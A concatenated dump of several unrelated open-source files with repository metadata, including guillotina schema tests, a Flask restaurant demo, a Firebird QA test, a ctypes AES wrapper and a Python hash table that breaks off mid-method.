required=False, missing_value=missing, constraint=_fail,
)
self.assertEqual(field.validate(missing), None) # doesn't raise
def test_validate_missing_and_required(self):
from guillotina.schema.exceptions import RequiredMissing
missing = object()
def _fail(value):
return False
field = self._makeOne(
required=True, missing_value=missing, constraint=_fail,
)
self.assertRaises(RequiredMissing, field.validate, missing)
def test_validate_wrong_type(self):
from guillotina.schema.exceptions import WrongType
def _fail(value):
return False
field = self._makeOne(required=True, constraint=_fail)
field._type = str
self.assertRaises(WrongType, field.validate, 1)
def test_validate_constraint_fails(self):
from guillotina.schema.exceptions import ConstraintNotSatisfied
def _fail(value):
return False
field = self._makeOne(required=True, constraint=_fail)
field._type = int
self.assertRaises(ConstraintNotSatisfied, field.validate, 1)
def test_validate_constraint_raises_StopValidation(self):
from guillotina.schema.exceptions import StopValidation
def _fail(value):
raise StopValidation
field = self._makeOne(required=True, constraint=_fail)
field._type = int
field.validate(1) # doesn't raise
def test___eq___different_type(self):
left = self._makeOne()
class Derived(self._getTargetClass()):
pass
right = Derived()
self.assertEqual(left == right, False)
self.assertEqual(left != right, True)
def test___eq___same_type_different_attrs(self):
left = self._makeOne(required=True)
right = self._makeOne(required=False)
self.assertEqual(left == right, False)
self.assertEqual(left != right, True)
def test___eq___same_type_same_attrs(self):
left = self._makeOne()
right = self._makeOne()
self.assertEqual(left == right, True)
self.assertEqual(left != right, False)
def test_get_miss(self):
field = self._makeOne(__name__='nonesuch')
inst = DummyInst()
self.assertRaises(AttributeError, field.get, inst)
def test_get_hit(self):
field = self._makeOne(__name__='extant')
inst = DummyInst()
inst.extant = 'EXTANT'
self.assertEqual(field.get(inst), 'EXTANT')
def test_query_miss_no_default(self):
field = self._makeOne(__name__='nonesuch')
inst = DummyInst()
self.assertEqual(field.query(inst), None)
def test_query_miss_w_default(self):
field = self._makeOne(__name__='nonesuch')
inst = DummyInst()
self.assertEqual(field.query(inst, 'DEFAULT'), 'DEFAULT')
def test_query_hit(self):
field = self._makeOne(__name__='extant')
inst = DummyInst()
inst.extant = 'EXTANT'
self.assertEqual(field.query(inst), 'EXTANT')
def test_set_readonly(self):
field = self._makeOne(__name__='lirame', readonly=True)
inst = DummyInst()
self.assertRaises(TypeError, field.set, inst, 'VALUE')
def test_set_hit(self):
field = self._makeOne(__name__='extant')
inst = DummyInst()
inst.extant = 'BEFORE'
field.set(inst, 'AFTER')
self.assertEqual(inst.extant, 'AFTER')
class ContainerTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Container
return Container
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate(None)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
self.assertRaises(RequiredMissing, field.validate, None)
def test__validate_not_collection_not_iterable(self):
from guillotina.schema.exceptions import NotAContainer
cont = self._makeOne()
self.assertRaises(NotAContainer, cont._validate, object())
def test__validate_collection_but_not_iterable(self):
cont = self._makeOne()
class Dummy(object):
def __contains__(self, item):
return False
cont._validate(Dummy()) # doesn't raise
def test__validate_not_collection_but_iterable(self):
cont = self._makeOne()
class Dummy(object):
def __iter__(self):
return iter(())
cont._validate(Dummy()) # doesn't raise
def test__validate_w_collections(self):
cont = self._makeOne()
cont._validate(()) # doesn't raise
cont._validate([]) # doesn't raise
cont._validate('') # doesn't raise
cont._validate({}) # doesn't raise
class IterableTests(ContainerTests):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Iterable
return Iterable
def test__validate_collection_but_not_iterable(self):
from guillotina.schema.exceptions import NotAnIterator
itr = self._makeOne()
class Dummy(object):
def __contains__(self, item):
return False
self.assertRaises(NotAnIterator, itr._validate, Dummy())
class OrderableTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Orderable
return Orderable
def _makeOne(self, *args, **kw):
# Orderable is a mixin for a type derived from Field
from guillotina.schema._bootstrapfields import Field
class Mixed(self._getTargetClass(), Field):
pass
return Mixed(*args, **kw)
def test_ctor_defaults(self):
ordb = self._makeOne()
self.assertEqual(ordb.min, None)
self.assertEqual(ordb.max, None)
self.assertEqual(ordb.default, None)
def test_ctor_default_too_small(self):
# This test exercises _validate, too
from guillotina.schema.exceptions import TooSmall
self.assertRaises(TooSmall, self._makeOne, min=0, default=-1)
def test_ctor_default_too_large(self):
# This test exercises _validate, too
from guillotina.schema.exceptions import TooBig
self.assertRaises(TooBig, self._makeOne, max=10, default=11)
class MinMaxLenTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import MinMaxLen
return MinMaxLen
def _makeOne(self, *args, **kw):
# MinMaxLen is a mixin for a type derived from Field
from guillotina.schema._bootstrapfields import Field
class Mixed(self._getTargetClass(), Field):
pass
return Mixed(*args, **kw)
def test_ctor_defaults(self):
mml = self._makeOne()
self.assertEqual(mml.min_length, 0)
self.assertEqual(mml.max_length, None)
def test_validate_too_short(self):
from guillotina.schema.exceptions import TooShort
mml = self._makeOne(min_length=1)
self.assertRaises(TooShort, mml._validate, ())
def test_validate_too_long(self):
from guillotina.schema.exceptions import TooLong
mml = self._makeOne(max_length=2)
self.assertRaises(TooLong, mml._validate, (0, 1, 2))
class TextTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Text
return Text
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
txt = self._makeOne()
self.assertEqual(txt._type, str)
def test_validate_wrong_types(self):
from guillotina.schema.exceptions import WrongType
field = self._makeOne()
self.assertRaises(WrongType, field.validate, b'')
self.assertRaises(WrongType, field.validate, 1)
self.assertRaises(WrongType, field.validate, 1.0)
self.assertRaises(WrongType, field.validate, ())
self.assertRaises(WrongType, field.validate, [])
self.assertRaises(WrongType, field.validate, {})
self.assertRaises(WrongType, field.validate, set())
self.assertRaises(WrongType, field.validate, frozenset())
self.assertRaises(WrongType, field.validate, object())
def test_validate_w_invalid_default(self):
from guillotina.schema.exceptions import ValidationError
self.assertRaises(ValidationError, self._makeOne, default=b'')
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate('')
field.validate('abc')
field.validate('abc\ndef')
field.validate(None)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
field.validate('')
field.validate('abc')
field.validate('abc\ndef')
self.assertRaises(RequiredMissing, field.validate, None)
def test_from_unicode_miss(self):
from guillotina.schema.exceptions import WrongType
deadbeef = b'DEADBEEF'
txt = self._makeOne()
self.assertRaises(WrongType, txt.from_unicode, deadbeef)
def test_from_unicode_hit(self):
deadbeef = 'DEADBEEF'
txt = self._makeOne()
self.assertEqual(txt.from_unicode(deadbeef), deadbeef)
class TextLineTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._field import TextLine
return TextLine
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_class_conforms_to_ITextLine(self):
from zope.interface.verify import verifyClass
from guillotina.schema.interfaces import ITextLine
verifyClass(ITextLine, self._getTargetClass())
def test_instance_conforms_to_ITextLine(self):
from zope.interface.verify import verifyObject
from guillotina.schema.interfaces import ITextLine
verifyObject(ITextLine, self._makeOne())
def test_validate_wrong_types(self):
from guillotina.schema.exceptions import WrongType
field = self._makeOne()
self.assertRaises(WrongType, field.validate, b'')
self.assertRaises(WrongType, field.validate, 1)
self.assertRaises(WrongType, field.validate, 1.0)
self.assertRaises(WrongType, field.validate, ())
self.assertRaises(WrongType, field.validate, [])
self.assertRaises(WrongType, field.validate, {})
self.assertRaises(WrongType, field.validate, set())
self.assertRaises(WrongType, field.validate, frozenset())
self.assertRaises(WrongType, field.validate, object())
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate('')
field.validate('abc')
field.validate(None)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
field.validate('')
field.validate('abc')
self.assertRaises(RequiredMissing, field.validate, None)
def test_constraint(self):
field = self._makeOne()
self.assertEqual(field.constraint(''), True)
self.assertEqual(field.constraint('abc'), True)
self.assertEqual(field.constraint('abc\ndef'), False)
class PasswordTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Password
return Password
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_set_unchanged(self):
klass = self._getTargetClass()
pw = self._makeOne()
inst = DummyInst()
before = dict(inst.__dict__)
pw.set(inst, klass.UNCHANGED_PASSWORD) # doesn't raise, doesn't write
after = dict(inst.__dict__)
self.assertEqual(after, before)
def test_set_normal(self):
pw = self._makeOne(__name__='password')
inst = DummyInst()
pw.set(inst, 'PASSWORD')
self.assertEqual(inst.password, 'PASSWORD')
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate('')
field.validate('abc')
field.validate(None)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
field.validate('')
field.validate('abc')
self.assertRaises(RequiredMissing, field.validate, None)
def test_validate_unchanged_not_already_set(self):
from guillotina.schema.exceptions import WrongType
klass = self._getTargetClass()
inst = DummyInst()
pw = self._makeOne(__name__='password').bind(inst)
self.assertRaises(WrongType,
pw.validate, klass.UNCHANGED_PASSWORD)
def test_validate_unchanged_already_set(self):
klass = self._getTargetClass()
inst = DummyInst()
inst.password = 'foobar'
pw = self._makeOne(__name__='password').bind(inst)
pw.validate(klass.UNCHANGED_PASSWORD) # doesn't raise
def test_constraint(self):
field = self._makeOne()
self.assertEqual(field.constraint(''), True)
self.assertEqual(field.constraint('abc'), True)
self.assertEqual(field.constraint('abc\ndef'), False)
class BoolTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Bool
return Bool
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
txt = self._makeOne()
self.assertEqual(txt._type, bool)
def test__validate_w_int(self):
boo = self._makeOne()
boo._validate(0) # doesn't raise
boo._validate(1) # doesn't raise
def test_set_w_int(self):
boo = self._makeOne(__name__='boo')
inst = DummyInst()
boo.set(inst, 0)
self.assertEqual(inst.boo, False)
boo.set(inst, 1)
self.assertEqual(inst.boo, True)
def test_from_unicode_miss(self):
txt = self._makeOne()
self.assertEqual(txt.from_unicode(''), False)
self.assertEqual(txt.from_unicode('0'), False)
self.assertEqual(txt.from_unicode('1'), False)
self.assertEqual(txt.from_unicode('False'), False)
self.assertEqual(txt.from_unicode('false'), False)
def test_from_unicode_hit(self):
txt = self._makeOne()
self.assertEqual(txt.from_unicode('True'), True)
self.assertEqual(txt.from_unicode('true'), True)
class IntTests(unittest.TestCase):
def _getTargetClass(self):
from guillotina.schema._bootstrapfields import Int
return Int
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test_ctor_defaults(self):
txt = self._makeOne()
self.assertEqual(txt._type, int)
def test_validate_not_required(self):
field = self._makeOne(required=False)
field.validate(None)
field.validate(10)
field.validate(0)
field.validate(-1)
def test_validate_required(self):
from guillotina.schema.exceptions import RequiredMissing
field = self._makeOne()
field.validate(10)
field.validate(0)
field.validate(-1)
self.assertRaises(RequiredMissing, field.validate, None)
def test_validate_min(self):
from guillotina.schema.exceptions import TooSmall
field = self._makeOne(min=10)
field.validate(10)
field.validate(20)
self.assertRaises(TooSmall, field.validate, 9)
self.assertRaises(TooSmall, field.validate, -10)
def test_validate_max(self):
from guillotina.schema.exceptions import TooBig
field = self._makeOne(max=10)
field.validate(5)
field.validate(9)
field.validate(10)
self.assertRaises(TooBig, field.validate, 11)
self.assertRaises(TooBig, field.validate, 20)
def test_validate_min_and_max(self):
from guillotina.schema.exceptions import TooBig
from guillotina.schema.exceptions import TooSmall
field = self._makeOne(min=0, max=10)
field.validate(0)
field.validate(5)
field.validate(10)
self.assertRaises(TooSmall, field.validate, -10)
self.assertRaises(TooSmall, field.validate, -1)
self.assertRaises(TooBig, field.validate, 11)
self.assertRaises(TooBig, field.validate, 20)
def test_from_unicode_miss(self):
txt = self._makeOne()
self.assertRaises(ValueError, txt.from_unicode, '')
self.assertRaises(ValueError, txt.from_unicode, 'False')
self.assertRaises(ValueError, txt.from_unicode, 'True')
def test_from_unicode_hit(self):
txt = self._makeOne()
self.assertEqual(txt.from_unicode('0'), 0)
self.assertEqual(txt.from_unicode('1'), 1)
self.assertEqual(txt.from_unicode('-1'), -1)
class DummyInst(object):
missing_value = object()
def __init__(self, exc=None):
self._exc = exc
def validate(self, value):
if self._exc is not None:
raise self._exc()
def test_suite():
return unittest.TestSuite((
unittest.makeSuite(ValidatedPropertyTests),
unittest.makeSuite(DefaultPropertyTests),
unittest.makeSuite(FieldTests),
unittest.makeSuite(ContainerTests),
unittest.makeSuite(IterableTests),
unittest.makeSuite(OrderableTests),
unittest.makeSuite(MinMaxLenTests),
unittest.makeSuite(TextTests),
unittest.makeSuite(TextLineTests),
unittest.makeSuite(PasswordTests),
unittest.makeSuite(BoolTests),
unittest.makeSuite(IntTests),
))
| 33.902622
| 79
| 0.647739
| 25,872
| 0.952718
| 0
| 0
| 0
| 0
| 0
| 0
| 1,663
| 0.061239
|
ac8b7c1d0b88747e30dd4b04da5a9e3ae9540f10
| 2,410
|
py
|
Python
|
project.py
|
pedroalvesfilho/rest_flask_render0
|
81b7e1e865d083718a60e5ec38a0ca8f889e14f8
|
[
"MIT"
] | null | null | null |
project.py
|
pedroalvesfilho/rest_flask_render0
|
81b7e1e865d083718a60e5ec38a0ca8f889e14f8
|
[
"MIT"
] | null | null | null |
project.py
|
pedroalvesfilho/rest_flask_render0
|
81b7e1e865d083718a60e5ec38a0ca8f889e14f8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from flask import Flask
from flask import render_template, request
app = Flask(__name__)
"""
# https://www.pluralsight.com/guides/manipulating-lists-dictionaries-python
# A list is a mutable, ordered sequence of items.
# list = ['a', 'b', 'c']
# list[0]
# A dictionary is a mutable, unordered set of key-value pairs where each key must be unique.
# dictionary = {}
# In Python, a dictionary is an unordered collection of items. For example:
# dictionary = {'key' : 'value', 'key_2': 'value_2'}
# dictionary['key']
"""
# Fake restaurants
restaurants = [ # Start a list `[...]` with dictionaries `{...}` inside
{'name': 'The CRUDdy Crab'}, # 'index': '0'
{'name': 'Blue Burger'}, # 'index': '1'
{'name': 'Taco Hut'} # 'index': '3'
]
# >>> print(restaurants)
# [{'name': 'The CRUDdy Crab'}, {'name': 'Blue Burger'}, {'name': 'Taco Hut'}]
# >>>
# >>> print(restaurants[0])
# {'name': 'The CRUDdy Crab'}
# >>>
# >>> print(restaurants[0]['name'])
# The CRUDdy Crab
# >>>
# Fake Menu Items
items = [
{'name': 'Cheese Pizza', 'description': 'made with fresh cheese',
'price': '$5.59', 'course': 'Entree'}, # 'index': '0'
{'name': 'Cheese Pizza2', 'description': 'made with fresh cheese2',
'price': '$6.59', 'course': 'Entree2'}, # 'index': '1'
{'name': 'Cheese Pizza3', 'description': 'made with fresh cheese3',
'price': '$7.59', 'course': 'Entree3'}, # 'index': '2'
{'name': 'Cheese Pizza4', 'description': 'made with fresh cheese4',
'price': '$8.59', 'course': 'Entree4'}, # 'index': '3'
]
@app.route('/restaurant/')
@app.route('/')
def showRestaurant():
# RESTAURANT HOME PAGE
return render_template('restaurant.html', restaurantx = restaurants)
@app.route('/restaurant/<int:restid>/edit/<string:restname>', methods=['GET','POST'])
def editRestaurant(restid, restname):
# EDIT RESTAURANT
# https://hackersandslackers.com/flask-routes/
if request.method == 'POST':
restname = request.form.get('name')
restid = request.form.get('id')
restid0 = int(restid)
restaurants[restid0]['name'] = restname
return render_template('editrestaurant.html', restid = restid, restname = restname)
if __name__ == '__main__':
app.secret_key = 'super_secret_key'
app.debug = True
app.run(host='localhost', port=5000)
| 33.472222
| 92
| 0.607469
| 0
| 0
| 0
| 0
| 643
| 0.266805
| 0
| 0
| 1,540
| 0.639004
|
ac8b7fc77b1b29feaa2f6078b42fbbccbd054d3d
| 1,971
|
py
|
Python
|
tests/bugs/core_1894_test.py
|
FirebirdSQL/firebird-qa
|
96af2def7f905a06f178e2a80a2c8be4a4b44782
|
[
"MIT"
] | 1
|
2022-02-05T11:37:13.000Z
|
2022-02-05T11:37:13.000Z
|
tests/bugs/core_1894_test.py
|
FirebirdSQL/firebird-qa
|
96af2def7f905a06f178e2a80a2c8be4a4b44782
|
[
"MIT"
] | 1
|
2021-09-03T11:47:00.000Z
|
2021-09-03T12:42:10.000Z
|
tests/bugs/core_1894_test.py
|
FirebirdSQL/firebird-qa
|
96af2def7f905a06f178e2a80a2c8be4a4b44782
|
[
"MIT"
] | 1
|
2021-06-30T14:14:16.000Z
|
2021-06-30T14:14:16.000Z
|
#coding:utf-8
#
# id: bugs.core_1894
# title: Circular dependencies between computed fields crashs the engine
# decription:
# Checked on LI-T4.0.0.419 after commit 19.10.2016 18:26
# https://github.com/FirebirdSQL/firebird/commit/6a00b3aee6ba17b2f80a5b00def728023e347707
# -- all OK.
#
# tracker_id: CORE-1894
# min_versions: ['3.0.2']
# versions: 3.0.2
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0.2
# resources: None
substitutions_1 = []
init_script_1 = """"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
recreate table t (
n integer,
n1 computed by (n),
n2 computed by (n1)
);
recreate table t2 (
n integer,
c1 computed by (1),
c2 computed by (c1)
);
alter table t alter n1 computed by (n2);
commit;
set autoddl off;
alter table t2 drop c1;
alter table t2 add c1 computed by (c2);
commit;
select * from t;
select * from t2; -- THIS LEAD SERVER CRASH (checked on WI-T4.0.0.399)
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stderr_1 = """
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-Cannot have circular dependencies with computed fields
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-cannot delete
-COLUMN T2.C1
-there are 1 dependencies
Statement failed, SQLSTATE = 42000
Cannot have circular dependencies with computed fields
Statement failed, SQLSTATE = 42000
unsuccessful metadata update
-cannot delete
-COLUMN T2.C1
-there are 1 dependencies
"""
@pytest.mark.version('>=3.0.2')
def test_1(act_1: Action):
act_1.expected_stderr = expected_stderr_1
act_1.execute()
assert act_1.clean_stderr == act_1.clean_expected_stderr
| 24.036585
| 106
| 0.650431
| 0
| 0
| 0
| 0
| 185
| 0.093861
| 0
| 0
| 1,508
| 0.765094
|
3ba2a6cd1ef7931310fdf480d5b0bc1594f43a55
| 1,296
|
py
|
Python
|
lib/pykdlib/modules.py
|
bin601/pkyd
|
2b60c0ebd81e9e3e29f88ea60691d5c403df2160
|
[
"MIT"
] | 1
|
2020-05-31T20:11:03.000Z
|
2020-05-31T20:11:03.000Z
|
lib/pykdlib/modules.py
|
bin601/pykd
|
2b60c0ebd81e9e3e29f88ea60691d5c403df2160
|
[
"MIT"
] | null | null | null |
lib/pykdlib/modules.py
|
bin601/pykd
|
2b60c0ebd81e9e3e29f88ea60691d5c403df2160
|
[
"MIT"
] | 1
|
2020-11-13T11:12:47.000Z
|
2020-11-13T11:12:47.000Z
|
#
# Modules Info
#
import pykd
moduleList = []
def reloadModules():
global moduleList
for m in moduleList: globals()[ m.name().lower() ] = None
if pykd.isKernelDebugging():
global nt
nt = pykd.loadModule("nt")
modules = pykd.typedVarList( nt.PsLoadedModuleList, "nt", "_LDR_DATA_TABLE_ENTRY", "InLoadOrderLinks" )
moduleList.append( nt )
else:
ntdll = pykd.loadModule("ntdll")
peb = pykd.typedVar( "ntdll", "_PEB", pykd.getCurrentProcess() )
ldr = pykd.typedVar( "ntdll", "_PEB_LDR_DATA", peb.Ldr )
modules = pykd.typedVarList( ldr.InLoadOrderModuleList.getAddress(), "ntdll", "_LDR_DATA_TABLE_ENTRY", "InLoadOrderLinks" )
moduleList = []
for m in modules:
baseName = str( pykd.loadUnicodeString( m.BaseDllName.getAddress() ) )
if baseName=="ntoskrnl.exe":
continue
module = pykd.findModule( m.DllBase )
globals()[ module.name().lower() ] = module
moduleList.append( module )
def printModuleList():
pykd.dprintln( "\n".join( [ str(m) for m in moduleList ] ) )
reloadModules()
| 17.28
| 133
| 0.549383
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 177
| 0.136574
|
3ba3da7e08c14ac9df758e9e45e7cb972fc56eb2
| 139
|
py
|
Python
|
compiled/construct/repeat_eos_u4.py
|
smarek/ci_targets
|
c5edee7b0901fd8e7f75f85245ea4209b38e0cb3
|
[
"MIT"
] | 4
|
2017-04-08T12:55:11.000Z
|
2020-12-05T21:09:31.000Z
|
compiled/construct/repeat_eos_u4.py
|
smarek/ci_targets
|
c5edee7b0901fd8e7f75f85245ea4209b38e0cb3
|
[
"MIT"
] | 7
|
2018-04-23T01:30:33.000Z
|
2020-10-30T23:56:14.000Z
|
compiled/construct/repeat_eos_u4.py
|
smarek/ci_targets
|
c5edee7b0901fd8e7f75f85245ea4209b38e0cb3
|
[
"MIT"
] | 6
|
2017-04-08T11:41:14.000Z
|
2020-10-30T22:47:31.000Z
|
from construct import *
from construct.lib import *
repeat_eos_u4 = Struct(
'numbers' / GreedyRange(Int32ul),
)
_schema = repeat_eos_u4
| 15.444444
| 34
| 0.755396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.064748
|
3ba72f829fd19f1024caa6c030fe4b09746f7a00
| 2,981
|
py
|
Python
|
Python/simpleencrypt/aes256.py
|
shreyasnayak/SimpleEncrypt
|
32223ee7a52baf186c53ac065cb61e9a32e4d20f
|
[
"MIT"
] | null | null | null |
Python/simpleencrypt/aes256.py
|
shreyasnayak/SimpleEncrypt
|
32223ee7a52baf186c53ac065cb61e9a32e4d20f
|
[
"MIT"
] | null | null | null |
Python/simpleencrypt/aes256.py
|
shreyasnayak/SimpleEncrypt
|
32223ee7a52baf186c53ac065cb61e9a32e4d20f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# aes256.py
# This file is part of SimpleEncrypt project (https://github.com/shreyasnayak/SimpleEncrypt)
#
# Copyright Shreyas Nayak (c) 2021-2022 <shreyasnayak21@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
__author__ = "Shreyas Nayak"
__email__ = "shreyasnayak21@gmail.com"
__copyright__ = "Copyright 2021-2022 Shreyas Nayak"
__license__ = "MIT"
from ctypes import *
CDLL("libcrypto.so.1.1", mode = RTLD_GLOBAL)
CDLL("libssl.so.1.1", mode = RTLD_GLOBAL)
lib = cdll.LoadLibrary('/usr/local/lib/libSimpleEncrypt.so')
lib.freeme.argtypes = c_void_p,
lib.freeme.restype = None
lib.encryptMessage.argtypes = [c_char_p,c_char_p,c_char_p]
lib.encryptMessage.restype = c_void_p
lib.decryptMessage.argtypes = [c_char_p,c_char_p,c_char_p]
lib.decryptMessage.restype = c_void_p
def encrypt(plainText,key,iv):
"""
Encrypt text with the initiation vector and key
@param plainText: string Text to encrypt
@param key: string key
@param iv: string initiation vector
@type plainText: string
@type key: string
@type iv: string
@rtype: string
"""
en_ptr = lib.encryptMessage(c_char_p(plainText),c_char_p(key),c_char_p(iv))
value = cast(en_ptr, c_char_p).value
lib.freeme(en_ptr)
return value
def decrypt(ciphertext,key,iv):
"""
Encrypt text with the initiation vector and key
@param ciphertext: string ciphertext to decrypt
@param key: string key
@param iv: string initiation vector
@type ciphertext: string
@type key: string
@type iv: string
@rtype: string
"""
de_ptr = lib.decryptMessage(c_char_p(ciphertext),c_char_p(key),c_char_p(iv))
value = cast(de_ptr, c_char_p).value
lib.freeme(de_ptr)
return value
if __name__ == '__main__':
iv = b'171A065A7675A09AECEC118DBC008A822A041FC2EBF2B3E4CF7A4C966E5D5897'
key = b'2B5442AD8739992F'
plainText = b'TEXT'
print(decrypt(encrypt(plainText,key, iv),key,iv))
| 36.353659
| 92
| 0.739349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,023
| 0.678631
|
3ba741e941c63d039ed8b54e0f39f036cca0c01c
| 1,735
|
py
|
Python
|
tests/widgets/test_error_dialog.py
|
sisoe24/NukeServerSocket
|
fbb95a609fcaf462aeb349597fae23dda67bf49b
|
[
"MIT"
] | 12
|
2021-08-01T09:41:24.000Z
|
2021-12-03T02:53:10.000Z
|
tests/widgets/test_error_dialog.py
|
sisoe24/NukeServerSocket
|
fbb95a609fcaf462aeb349597fae23dda67bf49b
|
[
"MIT"
] | 5
|
2021-09-11T16:51:01.000Z
|
2022-02-18T16:20:29.000Z
|
tests/widgets/test_error_dialog.py
|
sisoe24/NukeServerSocket
|
fbb95a609fcaf462aeb349597fae23dda67bf49b
|
[
"MIT"
] | 2
|
2021-08-03T16:02:27.000Z
|
2021-08-06T07:51:54.000Z
|
"""Test module for the Error dialog widget."""
import os
import logging
import pytest
from PySide2.QtGui import QClipboard
from src.widgets import error_dialog
from src.about import about_to_string
@pytest.fixture()
def error_log_path(_package):
"""Get the log directory path."""
yield os.path.join(_package, 'src', 'log', 'errors.log')
@pytest.fixture(name='report')
def create_report(qtbot, error_log_path):
"""Initialize the ErrorDialog class and create an error report.
After tests, will clean the error.logs file.
Yields:
Report: a namedtuple with the link and the port attributes.
"""
widget = error_dialog.ErrorDialog('Test Error')
qtbot.addWidget(widget)
yield widget.prepare_report()
with open(error_log_path, 'w') as _:
pass
def test_report_return_value(report):
"""Check if prepare report return is a tuple."""
assert isinstance(report, tuple)
def test_prepare_report_link(report):
"""Check if error dialog returns the issues link when clicking Report."""
assert report.link == 'https://github.com/sisoe24/NukeServerSocket/issues'
def test_prepare_report_clipboard(report):
"""Check if report gets copied into clipboard."""
assert 'NukeServerSocket' in QClipboard().text()
def test_prepare_report_file(report, error_log_path):
"""Check if the report file has the about to string information."""
with open(error_log_path) as file:
assert about_to_string() in file.read()
def test_get_critical_logger():
"""Check if method returns the critical logger file handler."""
logger = error_dialog._get_critical_logger()
assert logger.name == 'Critical'
assert isinstance(logger, logging.FileHandler)
| 27.539683
| 78
| 0.725648
| 0
| 0
| 546
| 0.314697
| 595
| 0.342939
| 0
| 0
| 706
| 0.406916
|
3ba791283dc54edfe51e5015658bbc050291ab63
| 3,854
|
py
|
Python
|
DataStructure/Table/HashTable.py
|
zhangsifan/ClassicAlgorighthms
|
b769d46727279cf6d8532819076a3fef496d05c7
|
[
"Apache-2.0"
] | 27
|
2021-04-21T08:17:25.000Z
|
2021-06-30T07:04:49.000Z
|
DataStructure/Table/HashTable.py
|
zhangsifan/ClassicAlgorighthms
|
b769d46727279cf6d8532819076a3fef496d05c7
|
[
"Apache-2.0"
] | null | null | null |
DataStructure/Table/HashTable.py
|
zhangsifan/ClassicAlgorighthms
|
b769d46727279cf6d8532819076a3fef496d05c7
|
[
"Apache-2.0"
] | 1
|
2021-04-21T11:26:01.000Z
|
2021-04-21T11:26:01.000Z
|
# -*- coding: utf-8 -*-#
'''
@Project : ClassicAlgorighthms
@File : HashTable.py
@USER : ZZZZZ
@TIME : 2021/4/25 18:25
'''
class Node():
'''
链地址法解决冲突的结点
'''
def __init__(self, value = None, next = None):
self.val = value
self.next = next
class HashTable():
'''
哈希表是根据 值 直接进行访问的数据结构。
具体来说,通过把关键码值映射到表中一个位置来访问记录,以加快查找的速度。
这个映射函数叫做 散列函数,存放记录的数组叫做 散列表。
其中有两个关键点:
1. 如何把值映射到一个位置?
(1) * 除余法: h(k) = k mod p
(2) 平方散列法: h(k) = (value^2) >> 28
(3) 斐波那契散列法: h(k) = (value * 2654435769(MAX_INT32) ) >> 28
2. 如果两个值映射到了同一个位置,该怎么办?
(1) 开放定址法:线性重散列 二次重散列
(2) * 链地址法:每个地址作为一个链来存储
(3) 再散列法:构造多个hash函数
Notice:
想想,如果在链地址法中,将每个表结点作为一颗平衡二叉树的根结点,那么每个位置都将成为一棵平衡二叉树
查找时间复杂度变成了log2N,并且由于经过了哈希,分散了结点数量,真实运行起来会更快一些
本例中用除余法取哈希值
用链地址法解决冲突
'''
def __init__(self):
# 哈希表的大小
self._table_size = 11
# 哈希表,每个元素是个表头,采用头插法放入元素
self._table = []
for i in range(self._table_size):
self._table.append(Node())
# 元素个数
self._count = 0
def init(self, values):
'''
通过一个列表构造哈希表
:param values: 待构造的列表
:return: None
'''
for value in values:
self.insert(value)
def insert(self, value):
'''
向哈希表中插入一个值
:param value: 待插入值
:return: None
'''
# 找到了它的位置
index = self._hash(value)
# 为这个值建立结点
node = Node(value = value)
# 头插法插入对应的位置
node.next = self._table[index].next
self._table[index].next = node
# 数量+1
self._count += 1
def delete(self, value):
'''
从哈希表中删除一个值
:param value: 待删除值
:return: None
'''
# 找到它的哈希位置
index = self._hash(value)
# 在链表中进行查询
pre_node = self._table[index]
node = self._table[index].next
if self.search(value) == False:
raise Exception("no this value!")
